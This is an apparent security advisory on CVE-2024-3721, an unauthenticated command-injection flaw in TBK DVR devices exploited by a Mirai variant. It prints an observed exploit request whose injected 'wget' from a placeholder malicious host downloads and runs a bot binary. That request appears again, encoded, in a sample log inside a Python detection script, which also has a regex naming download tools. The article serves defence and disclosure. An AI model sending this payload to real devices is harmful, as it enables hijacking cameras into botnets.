CVE-2024-3721: Mirai Botnet Exploits TBK DVR Vulnerability

A newly discovered vulnerability in TBK DVR systems—CVE-2024-3721—is being actively exploited in the wild by a fresh variant of the Mirai botnet. Though scored as medium severity (CVSS 6.3), its real-world impact is far greater due to the combination of unauthenticated access, command injection, and global exposure of thousands of devices.

The Vulnerability

CVE-2024-3721 affects TBK DVR-4104 and DVR-4216 devices running firmware up to April 12, 2024. The flaw lies in the /device.rsp API endpoint, which mishandles input in the mdb and mdc parameters when the command ___S_O_S_T_R_E_A_MAX___ is issued. These fields are not properly sanitized, allowing attackers to inject arbitrary shell commands.

This leads to remote command execution on the underlying operating system without requiring any authentication.

Here’s an example of a malicious request observed in the wild:

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm arm7; wget http://<malicious-ip>/arm7; chmod 777 *; ./arm7 tbk

The injected payload downloads and executes a malicious binary that turns the device into a botnet node.

Active Exploitation by Mirai Variant

Soon after disclosure, researchers at Kaspersky’s Global Research and Analysis Team (GReAT) observed the vulnerability being used to spread a new Mirai-based malware variant. This version targets ARM-based devices and uses encrypted payloads and anti-emulation techniques to avoid detection.

Once infected, compromised DVRs are enrolled into a distributed denial-of-service (DDoS) network controlled via remote command and control infrastructure. In some cases, the malware also deploys additional persistence mechanisms and obfuscation layers.

More than 50,000 vulnerable DVR devices have been identified on the internet, most of them in China, India, Egypt, Turkey, Ukraine, and Brazil.

Technical Analysis

The vulnerability stems from insecure string concatenation used when constructing shell commands on the DVR. Rather than sanitizing input or using safe APIs, the firmware embeds user-controlled input directly into system-level calls. No access controls are applied, making the attack vector accessible over any exposed network interface.

Security vendors such as Check Point have already released detection signatures for their appliances (e.g., CPAI-2024-0254) covering this exploit. However, many devices remain unpatched and fully exposed.

Mitigation and Response

Device owners should immediately check for firmware updates from TBK and apply them. If no patch is available, systems should be taken offline or placed behind strict network controls.

  • Block external access to /device.rsp endpoints using network firewall rules.
  • Segment DVR devices onto isolated VLANs.
  • Monitor HTTP traffic for suspicious POST requests containing mdb or mdc fields with shell-like content.
  • Deploy intrusion detection systems with updated rulesets to catch exploit attempts.
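Detection logic for the monitoring bullet above, as an added example that is not code from the article or from Kaspersky: a small Python scanner that parses access-log lines in combined-log format (assumed), isolates /device.rsp requests, and flags mdb/mdc values that contain shell metacharacters or download/execute tokens. The sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined-log format (not taken from the
# article); the IPs are documentation addresses, and the first line reproduces
# the exploit shape described above with its payload percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2024:10:01:02 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20/tmp%3B%20rm%20arm7%3B%20wget%20http://198.51.100.9/arm7%3B%20chmod%20777%20*%3B%20./arm7%20tbk HTTP/1.1" 200 12
198.51.100.23 - - [12/Jun/2024:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.8 - - [12/Jun/2024:10:03:44 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=stream1 HTTP/1.1" 200 12
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters and download/exec tokens that have no business in a
# stream-name parameter; matched against the percent-decoded value.
SHELL_RE = re.compile(r'[;|&`$(){}<>\n]|\b(wget|curl|tftp|chmod|sh|busybox)\b')

def classify(line):
    """Return (severity, reason) for one log line; severity is None when benign."""
    m = REQUEST_RE.match(line)
    if not m:
        return None, "unparsed line"
    parts = urlsplit(m.group("target"))
    if parts.path != "/device.rsp":
        return None, "other endpoint"
    # parse_qs percent-decodes values, so an encoded ';' (%3B) is still caught.
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    hits = [k for k in ("mdb", "mdc") if SHELL_RE.search(params.get(k, ""))]
    if hits:
        return "high", "shell content in " + ",".join(hits)
    if params.get("cmd") == "___S_O_S_T_R_E_A_MAX___":
        return "low", "SOSTREAMAX command without shell content; review"
    return None, "device.rsp request without injection indicators"

def scan(log_text):
    """Return [(source_ip, severity, reason)] for every flagged line in the log."""
    findings = []
    for line in log_text.splitlines():
        severity, reason = classify(line)
        if severity:
            findings.append((REQUEST_RE.match(line).group("src"), severity, reason))
    return findings

if __name__ == "__main__":
    for src, severity, reason in scan(SAMPLE_LOG):
        print(f"{severity.upper():5} {src:15} {reason}")
```

The "low" tier exists because the ___S_O_S_T_R_E_A_MAX___ command is also used legitimately; only the presence of shell content in mdb/mdc indicates an injection attempt.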

Organizations with visibility over customer networks (e.g., MSSPs or ISPs) should consider issuing proactive alerts or quarantining infected endpoints.

Implications

This vulnerability is a stark reminder of the risks posed by unmanaged or poorly secured IoT devices. While the vulnerability itself is relatively straightforward, its exploitation highlights how quickly attackers can weaponize even low-profile flaws in widely distributed embedded systems.

In many cases, DVRs and surveillance devices remain operational in production networks for years, often with outdated firmware, weak credentials, and full internet exposure. Combined, these conditions make them attractive targets for malware propagation and botnet operations.

Final Thoughts

CVE-2024-3721 may not have made front-page headlines, but its impact is being felt across global botnet infrastructures. It reinforces the importance of applying least privilege principles, network segmentation, and timely firmware management—especially for IoT-class devices that often fly under the radar.

The return of Mirai in this context is no surprise. The infrastructure may be old, but the techniques are evolving. And until device security becomes a universal standard, opportunistic exploitation will remain inevitable.